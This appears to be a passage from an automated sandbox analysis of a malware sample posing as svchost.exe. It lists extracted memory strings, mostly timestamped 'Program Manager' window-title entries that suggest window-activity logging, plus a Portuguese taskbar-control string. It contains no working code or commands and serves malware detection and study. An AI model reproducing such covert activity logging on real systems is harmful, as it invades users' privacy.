Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:37:59 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:58:53 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:12:11 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:47:18 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:41:28 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:32:02 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:47:28 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:40:54 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:57:35 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 10:15:00 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:40:06 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:28:17 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:11:29 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:36:11 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:16:45 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:59:54 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:03:25 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:46:34 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:17:16 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:06:09 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:38:30 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:56:50 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:59:27 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:03:34 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:09:12 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:23:00 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:12:09 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 09:12:09 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 03:52:50 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:04:05 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:58:33 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 19:42:08 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:15:24 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:24:47 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:20:03 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 10:06:12 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:03:07 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 19:31:19 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:42:00 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 12:33:18 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:48:08 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:34:17 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:56:05 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 13:18:31 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 18:58:20 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:05:26 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:26:13 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:17:28 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:48:01 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 18:23:15 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 14:14:16 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:57:53 - Program Manager
Source: svchost.exe, 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.dr; Binary or memory string: Shell_traywnd+MostrarBarraDeTarefas
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:42:20 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:37:19 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:42:11 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:01:51 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:48:38 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:50:24 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:02:04 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:50:15 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:51:43 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:56:32 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:35:38 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 10:04:11 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:35:45 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:53:17 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:49:31 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:04:35 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 13:12:01 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:12:39 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 10:09:28 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:32:05 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:45:06 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 14:20:05 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:14:23 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:07:40 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 09:03:04 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:40:09 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:19:12 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:39:13 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:21:04 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:23:46 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:21:06 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:46:27 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:25:22 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 14:38:32 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:38:23 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:37:12 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:29:35 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:49:01 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:48:58 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:27:14 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:45:16 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:37:39 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:25:40 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:14:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:11:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:29:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:54:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:43:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:39:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:10:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:03:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:47:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:41:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:58:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:51:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.0000000003E91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:27:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:37:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:46:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:36:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:16:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:01:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:52:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:19:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:33:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:58:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:13:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:39:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:55:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:15:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:04:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:41:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:10:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:47:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:47:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:22:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:49:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:23:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:48:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:43:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:06:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:14:41 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:22:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:00:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:34:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:34:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:07:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:26:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:51:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:04:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:46:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:36:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:54:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:50:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:49:21 - Program Manager
